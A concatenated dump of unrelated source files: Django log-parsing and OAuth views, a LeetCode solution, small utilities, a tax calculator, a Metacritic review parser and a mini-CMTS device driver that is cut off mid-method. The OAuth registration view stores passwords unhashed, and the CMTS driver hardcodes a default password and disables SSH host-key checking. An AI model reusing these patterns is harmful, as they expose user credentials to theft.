errorlog['date'].replace('/', '-')\n data.time = errorlog['time']\n data.level = errorlog['level']\n 
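 # pid and tid are the two halves of the "$pid#$tid" token in the
 # nginx error-log format string defined above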
data.pid = errorlog['pid']\n data.tid = errorlog['tid']\n try:\n data.message = errorlog['message'].split(\",\")[0]\n data.client = errorlog['message'].split(\",\")[1].split(\":\")[1].strip()\n data.request = errorlog['message'].split(\",\")[3].split(\":\")[1].strip()\n except:\n data.message = errorlog['message']\n data.client = \"-\"\n data.request = \"-\"\n data.save()\n\n if tangent:\n if daily_bandwidth.objects.all().count() == 0:\n for k, v in hourly.items():\n data = daily_bandwidth()\n data.day = k\n data.bandwidth = v\n data.save()\n else:\n data = daily_bandwidth.objects.all()\n\n for _ in data:\n print(hourly[_.day])\n hourly[_.day] = int(hourly[_.day]) + int(_.bandwidth)\n\n for k, v in hourly.items():\n data = daily_bandwidth()\n data.day = k\n data.bandwidth = v\n data.save()\n with open(\"E:\\\\Server\\\\Logs\\\\nginx\\\\catalina.log\") as cat:\n for line in cat:\n line = line.strip()\n try:\n m = re.match(r'^(\\d+\\-\\S+\\-\\d{4})\\s(\\d+\\:\\d+\\:\\d+\\.\\d{3})\\s(\\S+)\\s(\\[\\S+\\])\\s(\\S+)\\s(.*)', line,\n re.I)\n data = error_logs()\n\n z = m[1].replace(m[1].split(\"-\")[1], str(strptime(m[1].split(\"-\")[1], '%b').tm_mon))\n format_str = '%d-%m-%Y'\n datetime_obj = datetime.strptime(z, format_str)\n data.date = datetime_obj\n data.time = m[2]\n data.level = m[3]\n\n data.tid = m[4]\n data.client = m[5]\n data.message = m[6]\n data.pid = '-'\n data.request = \"-\"\n data.save()\n except:\n print(\"NONE CATALIAN\")\n print(\"----%s seconds ----\" % (time.time() - start_time))\n return redirect('dashboard')\n else:\n print(\"lolbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbiiiiiiiiiiiiiiiiiiii\")\n flag = 1\n # return redirect('')\n return render(request, \"index/index.html\", {'flag': flag})\n","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"283938189","text":"\"\"\"459. Repeated Substring Pattern\nhttps://leetcode.com/problems/repeated-substring-pattern/\n\nGiven a non-empty string check if it can be constructed by taking a substring\nof it and appending multiple copies of the substring together.\nYou may assume the given string consists of lowercase English letters only\nand its length will not exceed 10000.\n\nExample 1:\n\nInput: \"abab\"\nOutput: True\nExplanation: It's the substring \"ab\" twice.\n\nExample 2:\n\nInput: \"aba\"\nOutput: False\n\nExample 3:\n\nInput: \"abcabcabcabc\"\nOutput: True\nExplanation: It's the substring \"abc\" four times. 
(And the substring \"abcabc\" twice.)\n\"\"\"\n\n\nclass Solution:\n def repeated_substring_pattern_1(self, s: str) -> bool:\n return s in (s + s)[1:-1]\n\n def repeated_substring_pattern(self, s: str) -> bool:\n def validate(prefix: str, start: int) -> bool:\n if start == n:\n return True\n if s[start:].startswith(prefix):\n return validate(prefix, start + len(prefix))\n else:\n return False\n\n n = len(s)\n for x in range(n // 2, 0, -1):\n if n % x == 0:\n if validate(s[:x], 0):\n return True\n return False\n","sub_path":"python-algorithm/leetcode/problem_459.py","file_name":"problem_459.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78163831","text":"from math import *\nimport functools\nimport sys\n\nclass OutputWriter:\n '''\n A class which wraps stdout, stderr and file writing so that the where\n particular data is to be written does not have to change how the user writes\n it\n '''\n def __init__(self, output_loc):\n self.output_loc = output_loc\n if output_loc == \"stdout\":\n self.output = sys.stdout\n elif output_loc == \"stderr\":\n self.output = sys.stderr\n else:\n self.output = open(output_loc, \"a\")\n\n def write(self, text):\n self.output.write(text + \"\\n\")\n\n def close(self):\n if not (self.output_loc in [\"stdout\", \"stderr\"]):\n self.output.close()\n\ndef non_trivial_factors(n):\n '''\n Returns a set of non-trivial (i.e. not 1 and itself) factors of natural\n number\n '''\n # Create a list of pairs of factors n\n fact_list = [[i, n // i] for i in range(2, ceil((sqrt(n)))+5) if n % i == 0]\n\n # If n is prime, fact_list will be empty, which will break reduce\n if fact_list == list():\n return set(list())\n\n # Reduce the pairs of factors, remove duplicates, and sort by size\n return sorted(set(functools.reduce(lambda a, b: a + b, fact_list)))\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53654435","text":"mystring1=input()\nmystring2=mystring1.strip('[')\nmystring3=mystring2.strip(']')\nlist1=mystring3.split(\",\")\nlist1=[int(x) for x in list1]\nn1=len(list1)\nmstring1=input()\nmstring2=mstring1.strip('[')\nmstring3=mstring2.strip(']')\nlist2=mstring3.split(\",\")\nlist2=[int(x) for x in list2]\nn2=len(list2)\nlist3=list1+list2\nlist3.sort()\nprint(list3)","sub_path":"Code/CodeRecords/2526/60651/303473.py","file_name":"303473.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"395220801","text":"grossIncome = float(input(\"Please enter your gross annual income in dollars:\"))\ntaxDeduct = float(input(\"Please enter your tax deductions in dollars:\"))\ntaxableIncome = 0.0\ntaxRate = 0.0\ntaxPayable = 0.0\nnetIncome = 0.0\n\nif (grossIncome >= 0.0 and grossIncome < 18200.00 ):\n taxRate = 0.0\nelse:\n if (grossIncome >= 18200.00 and grossIncome < 37000.00 ):\n taxRate = 0.19\n else:\n if (grossIncome >= 37000.00 and grossIncome < 90000.00 ):\n taxRate = 0.325\n else:\n if (grossIncome >= 90000.00 and grossIncome < 180000.00 ):\n taxRate = 0.37\n else:\n if (grossIncome >= 180000.00):\n taxRate = 0.45\n\ntaxableIncome = grossIncome-taxDeduct\ntaxPayable = taxableIncome*taxRate\nnetIncome = grossIncome-taxPayable\n\nprint(\"Your gross income is $%.2f\" %grossIncome)\nprint(\"Your tax deductions are $%.2f\" 
%taxDeduct)\nprint(\"Your tax rate is\", taxRate*100, \"percent\")\nprint(\"The amount of tax you owe is $%.2f\" %taxPayable)\nprint(\"Your net income is $%.2f\" %netIncome)\n","sub_path":"Week4/A/Week4_Branch11.py","file_name":"Week4_Branch11.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"483531221","text":"import requests\nfrom django.views import View\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.utils.http import urlencode\nimport json\n# from authlib.integrations.httpx_client import AsyncOAuth2Client\nfrom authlib.integrations.requests_client import OAuth2Session\nfrom asg_web_app import settings\nfrom asg_web_app.settings import oauth\nfrom user.models import User, AdditionalInfo, Interest\nfrom user.form import RegisterForm\n\n\n# TODO: set up the https to test\ndef google(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/google_callback'\n google = oauth.create_client('google')\n return google.authorize_redirect(request, redirect_uri)\n\n\ndef google_callback(request):\n print(\"in the callback\")\n # google = oauth.create_client('google')\n token = oauth.google.authorize_access_token(request)\n user = oauth.google.userinfo(request)\n # do something with the token and profile\n message = \"nothing received\"\n print(request.get_full_path())\n print(\"hi\")\n print(token)\n print(user)\n return render(request, \"oauth/index.html\", {'message': message})\n\n\ndef facebook(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/facebook_callback'\n facebook = oauth.create_client('facebook')\n return facebook.authorize_redirect(request, redirect_uri)\n\n\ndef facebook_callback(request):\n print(\"in the facebook callback\")\n # facebook = oauth.create_client('facebook')\n token = oauth.facebook.authorize_access_token(request)\n user = oauth.facebook.userinfo(request)\n # do something with the token and profile\n message = \"nothing received\"\n print(request.get_full_path())\n print(\"hi\")\n print(token)\n print(user)\n return render(request, \"oauth/index.html\", {'message': message})\n\n\ndef github(request):\n # The below client id and secret should be changed after you get your own id and secret\n redirect_uri = 'https://localhost:8000/oauth/github_callback'\n github = oauth.create_client('github')\n return github.authorize_redirect(request, redirect_uri)\n\n\ndef github_callback(request):\n token = oauth.github.authorize_access_token(request)\n resp = oauth.github.get(url='https://api.github.com/user', token=token)\n profile = resp.json()\n # do something with the token and profile\n return github_redirect(request, profile)\n\n\ndef github_redirect(request, profile):\n message = 'please register your account here!'\n new_user_name = profile['login']\n same_user_name = User.objects.filter(username=new_user_name)\n if same_user_name:\n message += 'The user name was already existed, please choose a new one'\n new_user_name = ''\n email = profile['email']\n if email is None:\n email = ''\n register_form = RegisterForm(initial={\n 'username': new_user_name,\n 'email': email,\n })\n return render(request, \"oauth/oauth_register.html\", {'message': message, 'register_form': register_form})\n\n\ndef final_register(request):\n if 
request.method == 'POST':\n register_form = RegisterForm(request.POST)\n check_term = request.POST.get('term_check') # another method to get check box, or can use form.cleaned_data\n if check_term == 'on':\n stored_form = register_form\n if register_form.is_valid():\n # dont wanna fill form again\n # username = register_form.cleaned_data['username']\n register_form.clean()\n username = request.POST.get('username')\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n email = request.POST.get('email')\n # check passwords are the same\n if password1 != password2:\n message = 'Not the same password'\n return render(request, 'user/register.html', {'message': message, 'register_form': stored_form})\n else:\n same_name_user = User.objects.filter(username=username)\n # check user name\n if same_name_user:\n message = 'The user name was already existed'\n return render(request, 'user/register.html',\n {'message': message, 'register_form': stored_form})\n\n same_email_user = User.objects.filter(email=email)\n if same_email_user:\n message = 'The email was registered, please use another one'\n return render(request, 'user/register.html',\n {'message': message, 'register_form': stored_form})\n interest = Interest()\n user = User()\n additional_info = AdditionalInfo()\n additional_info.save()\n interest.save()\n user.additionalInfo = additional_info\n user.interest = interest\n user.email = email\n user.password = password1\n user.username = username\n user.is_active = True\n user.save()\n # TODO: label as todo to ensure later check\n # the user was logged without verification of their email, may need change here\n request.session['is_login'] = True\n request.session['user_name'] = user.username\n return redirect('/user/index/')\n\n register_form = RegisterForm()\n message = 'There are something with the submitted form'\n\n return render(request, \"oauth/oauth_register.html\", locals())\n","sub_path":"ArtsourceGlobal/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"581038710","text":"'''\nCreated on Aug 10, 2021\n\n@author: Jacob Summers\n'''\n\n'''\nRepresents the object that parses information about a user review from the given html code\n'''\nclass album_review(object):\n '''\n Constructor for the Album_Review object\n Parameters:\n html represents the html code of a given user review\n '''\n def __init__(self, html):\n \n #represents the html code that contains the user review information\n self.html = html\n #represents the date that the review was published\n self.year = \"\"\n #represents the score that the user gave\n self.score = 0\n #represents the name of the user\n self.name = \"\"\n #represents the summary that the user gave\n self.summary = \"\"\n #represents how many people found the review helpful\n self.helpful = \"\"\n \n #begins parsing the information\n self._begin_parse()\n '''\n Prints the object as a formatted string\n '''\n def to_string(self):\n return \"Score of \" + self.get_score() + \" -- User: \" + self.get_name() + \" -- Date: \" + self.get_year() + \" -- \" + self.get_helpful()\n \n '''\n Gets the date of the user's review\n ''' \n def get_year(self):\n return self.year\n \n '''\n Gets the score that the user gave\n ''' \n def get_score(self):\n return self.score\n \n '''\n Gets the name of the user who made the review\n ''' \n def get_name(self):\n return self.name\n \n '''\n Gets the detailed 
summary of the user's review\n ''' \n def get_summary(self):\n return self.summary\n \n '''\n Gets the number of people who found the review helpful\n ''' \n def get_helpful(self):\n return self.helpful\n \n '''\n Parses the review information from the html code\n ''' \n def _begin_parse(self):\n \n '''\n Parses the date that the review was made\n '''\n def parse_year():\n #get the index where the date is located\n start_index = self.html.find(\"
\") + len(\"
\")\n html = self.html[start_index:]\n \n end_index = html.find(\"<\")\n \n #isolate it from the rest of the code\n year = html[:end_index]\n \n return year\n '''\n Parses the score that the user gave in the review\n '''\n def parse_score():\n \n #get the index where the score is located in the review\n start_index = self.html.find(\"
\") + len(\">\")\n end_index = html.find(\"
\")\n \n #isolate it from the rest of the html code\n score = html[start_index:end_index] \n \n \n return score\n \n '''\n Parses the name of the user in the review\n '''\n def parse_name():\n \n #get the index where the user's name is located\n start_index = self.html.find(\"\") + len(\">\")\n end_index = html.find(\"<\")\n \n #isolate it from the rest of the code\n name = html[start_index:end_index]\n \n return name\n '''\n Parses the text summary of the user's review\n '''\n def parse_summary():\n #isolate the summary from the rest of the user code\n start_index = self.html.find(\"
\") + len(\"
\")\n html = self.html[start_index:]\n end_index = html.find(\"
\")\n html = html[:end_index]\n \n #the summary is contained within if it can be expanded\n start_index = html.find(\"\") + len(\"\")\n \n #if the summary isn't expanded\n if (start_index - len(\"\") == -1):\n \n #contained with span tags\n start_index = html.find(\"\") + len(\"\")\n end_index = html.find(\"\")\n \n #isolate the summary from the rest of the html code\n summary = html[start_index:end_index]\n \n #remove excess whitespace from both sides\n summary = summary.strip()\n return summary\n \n html = html[start_index:]\n \n end_index = html.find(\"\")\n #isolate it from the rest of the html code\n summary = html[:end_index]\n \n return summary\n \n '''\n Parses the number of people that found the review helpful\n '''\n def parse_helpful():\n \n #find the count of people who found the review helpful\n start_index = self.html.find(\"\") + len(\"\")\n html = self.html[start_index:]\n \n end_index = html.find(\"\")\n #isolate it from the rest of the code and put it in a variable\n yescount = html[:end_index]\n \n #find the total count of users who found it helpful or not\n start_index = html.find(\"\") + len(\"\")\n html = html[start_index:]\n \n end_index = html.find(\"\")\n \n #isolate it from the rest of the code and put it in a variable\n totalcount = html[:end_index]\n \n \n #combine the two counts together into a formatted string\n return yescount + \" of \" + totalcount + \" users found this helpful\"\n \n \n #call the inner methods in order to parse the specific values and assign them to the instance variables\n self.year = parse_year()\n self.score = parse_score()\n self.name = parse_name()\n self.summary = parse_summary()\n self.helpful = parse_helpful()\n ","sub_path":"MetacriticWebScrape/src/webscrape/searchresults/categorydetails/albumdetail/albumparse/album_review.py","file_name":"album_review.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358215023","text":"#!/usr/bin/env python3\n# Copyright (c) 2020\n#\n# All rights reserved.\n#\n# This file is distributed under the Clear BSD license.\n# The full text can be found in LICENSE in the root directory.\nimport io\nimport ipaddress\nimport logging\nimport re\nimport sys\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom time import sleep\nfrom typing import Dict, List, Optional\n\nimport netaddr\nimport pandas as pd\nimport pexpect\nfrom boardfarm.devices.quagga_router import QuaggaRouter\nfrom boardfarm.exceptions import CodeError, ConnectionRefused, PexpectErrorTimeout\nfrom boardfarm.lib.bft_pexpect_helper import bft_pexpect_helper\nfrom boardfarm.lib.regexlib import AllValidIpv6AddressesRegex, ValidIpv4AddressRegex\nfrom tabulate import tabulate\nfrom termcolor import colored\n\nfrom boardfarm_docsis.devices.base_devices.cmts_template import CmtsTemplate\nfrom boardfarm_docsis.use_cases.cmts_interactions import is_bpi_privacy_disabled\n\nlogger = logging.getLogger(\"bft\")\n\n\nclass MiniCMTS(CmtsTemplate):\n \"\"\"Connects to and configures a Topvision 1U mini CMTS\"\"\"\n\n prompt = [\n \"Topvision(.*)>\",\n \"Topvision(.*)#\",\n r\"Topvision\\(.*\\)#\",\n r\"Topvision\\(.*\\)>\",\n ]\n model = \"mini_cmts\"\n\n def __init__(self, *args, **kwargs) -> None:\n \"\"\"Constructor method\"\"\"\n super().__init__(*args, **kwargs)\n self.conn_cmd = kwargs.get(\"conn_cmd\", None)\n self.connection_type = kwargs.get(\"connection_type\", \"local_serial\")\n self.ipaddr = kwargs.get(\"ipaddr\", None)\n 
self.username = kwargs.get(\"username\", \"admin\")\n self.password = kwargs.get(\"password\", \"admin\")\n self.password_admin = kwargs.get(\"password_admin\", \"admin\")\n self.mac_domain = kwargs.get(\"mac_domain\", None)\n self.port = kwargs.get(\"port\", 22)\n self.router_ipaddr = kwargs.get(\"router_ipaddr\", None)\n self.router_username = kwargs.get(\"router_username\", \"root\")\n self.router_password = kwargs.get(\"router_password\", \"bigfoot1\")\n self.router_port = kwargs.get(\"router_port\", None)\n if all(\n [\n self.router_ipaddr,\n self.router_username,\n self.router_password,\n self.router_port,\n ]\n ):\n self.__router = QuaggaRouter(\n ipaddr=self.router_ipaddr,\n port=self.router_port,\n username=self.router_username,\n password=self.router_password,\n )\n else:\n self.__router = None\n\n self.name = kwargs.get(\"name\", \"cmts\")\n self.connlock = None\n\n @property\n def _mini_cmts_router(self) -> Optional[QuaggaRouter]:\n \"\"\"Access the mini cmts router object in order to perform operations\n\n mini cmts router access is composed in the cmts class as protected and\n will be accessible in use cases through this protected property.\n\n :return: protected object of QuaggaRouter class if ip, password, user and port\n configs are given, else None\n :rtype: QuaggaRouter\n \"\"\"\n return self.__router\n\n def connect(self) -> None:\n \"\"\"Connect to the cmts.\n Login to the cmts based on the connection type available\n :raises Exception: Unable to get prompt on Topvision device\n \"\"\"\n for run in range(5):\n try:\n bft_pexpect_helper.spawn.__init__(\n self,\n command=\"ssh\",\n args=[\n f\"{self.username}@{self.ipaddr}\",\n \"-p\",\n str(self.port),\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-o\",\n \"UserKnownHostsFile=/dev/null\",\n \"-o\",\n \"ServerAliveInterval=60\",\n \"-o\",\n \"ServerAliveCountMax=5\",\n ],\n )\n try:\n i = self.expect(\n [\n \"yes/no\",\n \"assword:\",\n \"Last login\",\n self.username + \".*'s password:\",\n ]\n + self.prompt,\n timeout=30,\n )\n except PexpectErrorTimeout as err:\n logger.error(err)\n raise\n except pexpect.EOF:\n if hasattr(self, \"before\"):\n logger.debug(self.before)\n raise\n except (PexpectErrorTimeout, pexpect.EOF) as e:\n logger.error(e)\n logger.error(\n colored(\n f\"Failed to connect to CMTS. Attempt {run+1}\",\n color=\"red\",\n attrs=[\"bold\"],\n )\n )\n self.close()\n self.pid = None\n sleep(5) # take a moment before retrying\n continue\n try:\n self.logfile_read = sys.stdout\n if i == 0:\n self.sendline(\"yes\")\n i = self.expect([\"Last login\", \"assword:\"])\n if i in [1, 3]:\n self.sendline(self.password)\n self.expect(self.prompt[0])\n self.sendline(\"enable\")\n self.expect(self.prompt[1])\n self.additional_setup()\n return\n except pexpect.exceptions.TIMEOUT:\n logger.error(\n \"Unable to get prompt on Topvision mini CMTS device due to timeout.\"\n )\n self.close()\n self.pid = None\n except pexpect.EOF as e:\n logger.error(\n \"Something went wrong during CMTS initialisation. See exception below:\"\n )\n logger.error(repr(e))\n self.close()\n self.pid = None\n\n raise ConnectionRefused(f\"Unable to connect to {self.name}.\")\n\n def check_online(self, cm_mac: str) -> bool:\n \"\"\"Check the CM status from CMTS\n Checks the CM MAC state and returns True if online\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: True if the CM is online, False otherwise\n :rtype: boolean\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n try:\n result = scm.loc[cm_mac][\"MAC_STATE\"] in [\"online\", \"w-online(pt)\"]\n except KeyError:\n logger.error(f\"CM {cm_mac} is not found on cmts.\")\n result = False\n return result\n\n def logout(self) -> None:\n \"\"\"Logout of the CMTS device\"\"\"\n self.sendline(\"quit\")\n\n @CmtsTemplate.connect_and_run\n def interact(self, escape_character=None, input_filter=None, output_filter=None):\n \"\"\"To open an interact session\"\"\"\n super().interact()\n\n def additional_setup(self):\n \"\"\"Function to contain additional initialization steps\"\"\"\n # Change terminal length to inf in order to avoid pagination\n self.sendline(\"terminal length 0\")\n self.expect(self.prompt[1])\n # Increase connection timeout until a better solution is found\n self.sendline(\"config terminal\")\n self.expect(self.prompt)\n self.sendline(\"line vty\")\n self.expect(self.prompt)\n self.sendline(\"exec-timeout 60\")\n self.expect(self.prompt)\n self.sendline(\"end\")\n self.expect(self.prompt)\n\n @CmtsTemplate.connect_and_run\n def __run_and_return_df(\n self,\n cmd: str,\n columns: List[str],\n index: int,\n skiprows: int = 2,\n skipfooter: int = 1,\n dtype: Optional[dict] = None,\n ) -> pd.DataFrame:\n \"\"\"Internal wrapper for (tabbed output -> dataframe) parsing\n :param cmd: command whose output to parse\n :type cmd: str\n :param columns: names of columns in the df (same order as in output)\n :type columns: List[str]\n :param index: column (name or position) to use as the dataframe index\n :type index: int\n :param skiprows: how many rows to skip in the header\n :type skiprows: int\n :param skipfooter: how many rows to skip in the footer\n :type skipfooter: int\n :param dtype: dtypes to apply to specific columns\n :type dtype: dict or None\n :return: parsed dataframe\n \"\"\"\n output = self.check_output(cmd)\n return pd.read_csv(\n io.StringIO(output),\n skiprows=skiprows,\n skipfooter=skipfooter,\n names=columns,\n header=None,\n delim_whitespace=True,\n engine=\"python\",\n index_col=index,\n dtype=dtype,\n )\n\n @CmtsTemplate.connect_and_run\n def _show_cable_modem(self, additional_args: str = \"\") -> pd.DataFrame:\n \"\"\"Internal api to return the scm dataframe\"\"\"\n columns = [\n \"MAC_ADDRESS\",\n \"IP_ADDRESS\",\n \"I/F\",\n \"MAC_STATE\",\n \"PRIMARY_SID\",\n \"RXPWR(dBmV)\",\n \"TIMING_OFFSET\",\n \"NUMBER_CPE\",\n \"BPI_ENABLED\",\n \"ONLINE_TIME\",\n ]\n cmd = f\"show cable modem {additional_args}\"\n return self.__run_and_return_df(cmd=cmd, columns=columns, index=\"MAC_ADDRESS\")\n\n @CmtsTemplate.connect_and_run\n def _show_cable_modem_cpe(self, cm_mac: str) -> pd.DataFrame:\n \"\"\"Internal api to return the scm cpe dataframe\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: dataframe\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = [\n \"CPE_MAC\",\n \"CMC_INDEX\",\n \"CM_MAC\",\n \"CPE_IP_ADDRESS\",\n \"DUAL_IP\",\n \"CPE_TYPE\",\n \"LEASE_TIME\",\n \"LEARNED\",\n ]\n cmd = f\"show cable modem {cm_mac} cpe\"\n return self.__run_and_return_df(\n cmd=cmd, columns=columns, index=\"CPE_MAC\", skiprows=1, skipfooter=6\n )\n\n 
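# NOTE: the show-cable-modem helpers above and below parse whitespace-delimited\n # CLI tables; the hard-coded column lists assume the firmware's current output layout.\n 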
@CmtsTemplate.connect_and_run\n def _show_cable_modem_bonded_channels(self, cm_mac: str) -> pd.DataFrame:\n \"\"\"Internal api to return the scm bonded channels dataframe\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :return: dataframe\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n columns = [\n \"MAC_ADDRESS\",\n \"IP_ADDRESS\",\n \"I/F\",\n \"MAC_STATE\",\n \"PRIMARY_SID\",\n \"UPSTREAM_PRIMARY\",\n \"DOWNSTREAM_PRIMARY\",\n ]\n cmd = f\"show cable modem {cm_mac} primary-channel\"\n result = self.__run_and_return_df(\n cmd=cmd, columns=columns, index=\"MAC_ADDRESS\", skiprows=2, skipfooter=0\n )\n return result\n\n def DUT_chnl_lock(self, cm_mac: str) -> List[int]:\n \"\"\"Return the number of upstream / downstream channels that the modem is bonded to\n :param cm_mac: cable modem mac address\n :type cm_mac: str\n :return: [upstream_channels_count, downstream_channels_count]\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem_bonded_channels(cm_mac)\n upstream_list = str(scm.loc[cm_mac][\"UPSTREAM_PRIMARY\"])\n downstream_list = str(scm.loc[cm_mac][\"DOWNSTREAM_PRIMARY\"])\n # e.g. 4(1,2,3,5,6,7,8) 1(2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24)\n upstream_channels_count = len(\n upstream_list.replace(\"(\", \",\").replace(\")\", \"\").split(\",\")\n )\n downstream_channels_count = len(\n downstream_list.replace(\"(\", \",\").replace(\")\", \"\").split(\",\")\n )\n return [upstream_channels_count, downstream_channels_count]\n\n @CmtsTemplate.connect_and_run\n def is_cm_online(\n self,\n ignore_bpi: bool = False,\n ignore_partial: bool = False,\n ignore_cpe: bool = False,\n ) -> bool:\n \"\"\"Returns True if the CM status is operational\n :param ignore_bpi: returns True even when BPI is disabled\n :type ignore_bpi: boolean\n :param ignore_partial: returns True even when the CM is in partial service\n :type ignore_partial: boolean\n :param ignore_cpe: returns True even when LAN<->WAN forwarding is disabled\n :type ignore_cpe: boolean\n :return: True if the CM is operational, False otherwise\n :rtype: boolean\n \"\"\"\n scm = self._show_cable_modem()\n try:\n status = scm.loc[str(self.board_wan_mac)][\"MAC_STATE\"]\n except KeyError:\n logger.error(f\"CM {self.board_wan_mac} is not found on cmts.\")\n raise\n if \"offline\" in status:\n logger.debug(f\"Cable modem is {status}\")\n return False\n if \"init\" in status:\n logger.debug(f\"Cable modem is initialising: {status} \")\n return False\n if \"online\" not in status:\n logger.debug(f\"Cable modem in unknown state: {status} \")\n return False\n # now it must be in some sort of online state\n if not ignore_bpi and not re.search(r\"online\\(p(t|k)\", status):\n logger.debug(f\"Cable modem BPI is disabled: {status}\")\n return False\n if not ignore_partial and re.search(r\"p-online\", status):\n logger.debug(f\"Cable modem in partial service: {status}\")\n return False\n if not ignore_cpe and re.search(r\"online\\(d\", status):\n logger.debug(f\"Cable modem is prohibited from forwarding data: {status}\")\n return False\n logger.debug(f\"Cable modem is online: {status}\")\n return True\n\n @CmtsTemplate.connect_and_run\n def _clear_offline(self, cm_mac: str) -> None:\n \"\"\"Internal function to clear the CM entry from CMTS\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n self.sendline(f\"clear cable modem {cm_mac} delete\")\n self.expect(self.prompt)\n\n def clear_offline(self, cm_mac: str) -> None:\n \"\"\"Clear the CM entry from cmts which is offline - clear cable modem delete\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n \"\"\"\n self._clear_offline(cm_mac)\n\n def clear_cm_reset(self, cm_mac: str) -> None:\n \"\"\"Reset the CM from cmts using cli - clear cable modem reset\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n \"\"\"\n self._clear_cm_reset(cm_mac)\n\n @CmtsTemplate.connect_and_run\n def _clear_cm_reset(self, cm_mac: str) -> None:\n \"\"\"Internal function to reset the CM from cmts\"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n self.sendline(f\"clear cable modem {cm_mac} reset\")\n self.expect(self.prompt)\n\n def get_cmip(self, cm_mac: str) -> Optional[str]:\n \"\"\"API to get modem IPv4 address\n :param cm_mac: cable modem mac address\n :return: CM ip in case CM is online, None otherwise\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n return self._get_cable_modem_ip(cm_mac, ipv6=False)\n\n def get_cmipv6(self, cm_mac: str) -> Optional[str]:\n \"\"\"API to get modem IPv6 address\n :param cm_mac: cable modem mac address\n :return: CM ip in case CM is online, None otherwise\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n return self._get_cable_modem_ip(cm_mac, ipv6=True)\n\n def _get_cable_modem_ip(self, cm_mac: str, ipv6=False) -> str:\n \"\"\"Internal function to get cable modem ip\n :param cm_mac: mac address of the CM\n :type cm_mac: str\n :param ipv6: flag to return ipv6 address\n :type ipv6: bool\n :return: ip address of cable modem or \"None\"\n :rtype: string\n \"\"\"\n # FIXME: BOARDFARM-2422\n if not self.is_cm_online(\n ignore_bpi=is_bpi_privacy_disabled(), ignore_partial=True\n ):\n logger.debug(f\"Modem {cm_mac} is not online. Cannot get ip.\")\n return \"None\"\n additional_args = \"ipv6\" if ipv6 else \"\"\n for _ in range(5):\n scm = self._show_cable_modem(additional_args)\n try:\n ip_str = scm.loc[cm_mac][\"IP_ADDRESS\"].strip(\"*\")\n ip = netaddr.IPAddress(ip_str)\n break\n except KeyError:\n logger.error(f\"CM {cm_mac} is not found on cmts.\")\n ip = \"\"\n break\n except netaddr.core.AddrFormatError:\n ip = \"\"\n if ip_str == \"--\":\n logger.error(f\"Modem {cm_mac} offline\")\n break\n logger.error(f\"Failed to convert {ip_str}\")\n sleep(5)\n else:\n ip = None\n return str(ip)\n\n def check_partial_service(self, cm_mac: str) -> bool:\n \"\"\"Check the CM status from CMTS\n Checks the show cable modem output and returns True if p-online\n :param cm_mac: cm mac\n :type cm_mac: str\n :return: True if modem is in partial service, False otherwise\n :rtype: bool\n \"\"\"\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n scm = self._show_cable_modem()\n return \"p-online\" in scm.loc[cm_mac][\"MAC_STATE\"]\n\n def get_cmts_ip_bundle(\n self, cm_mac: Optional[str] = None, gw_ip: Optional[str] = None\n ) -> str:\n \"\"\"Get the CMTS bundle IP and validate that the gateway IP is configured on the CMTS and that both are in the same network\n The first host address within the network is assumed to be the gateway for the Mini CMTS\n :param cm_mac: cm mac\n :type cm_mac: str\n :param gw_ip: gateway ip\n :type gw_ip: str\n :raises AssertionError: ERROR: Failed to get the CMTS bundle IP\n :return: gateway ip if address configured on mini cmts else return all ip bundles\n :rtype: str\n \"\"\"\n return self._get_cmts_ip_bundle(cm_mac=cm_mac, gw_ip=gw_ip)\n\n @CmtsTemplate.connect_and_run\n def _get_cmts_ip_bundle(\n self, cm_mac: Optional[str] = None, gw_ip: Optional[str] = None\n ) -> str:\n \"\"\"Internal function to get CMTS bundle IP\"\"\"\n if cm_mac:\n cm_mac = self.get_cm_mac_cmts_format(cm_mac)\n 
